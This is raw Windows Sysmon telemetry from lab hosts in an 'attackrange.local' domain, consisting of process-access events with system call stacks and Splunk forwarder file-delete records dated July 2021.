08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:38.049{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x8000000000000000810019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:39.886{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B45C9602FD2C318A0AFCFAA01D2FD416,SHA256=B6EE0C8CCA9C714FEEF0E3A4A4D6FF3AAE771C82DE512DA022736A70C3B635F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.960{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24A241B20B2D179E219A82528A6495F0,SHA256=F4EA25498A178608A280E0792961155EFFDFEDA478874B8D28B55D35CF6CD899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.444{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D696B93D45676BFB2B8AE6828BF1CC2D,SHA256=5C1E6C9527C8209ADA939A226DEF4ECA50B18F299206E07779E8900A548762F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.422{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:39.422{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+36f20|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+32f80|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+22534|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\SharedStartModel.dll+77f37|C:\Windows\System32\SharedStartModel.dll+b2d9d|C:\Windows\System32\SharedStartModel.dll+b2a24|C:\Windows\System32\SharedStartModel.dll+b2fab|C:\Windows\system32\windows.cortana.Desktop.dll+a274|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows
\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f 10341000x80000000000000001053848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.360{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|
C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.360{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x8000000000000000810020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:40.886{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E5EBFBE0DFFA72F6BC849598BA7FD62,SHA256=C96200E007273A3AB6ABCBB92B9F058E87421425AA372C0C331F7AF44060A552,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.910{466BC892-02AF-60E8-1300-00000000CF01}976948C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.796{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.781{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
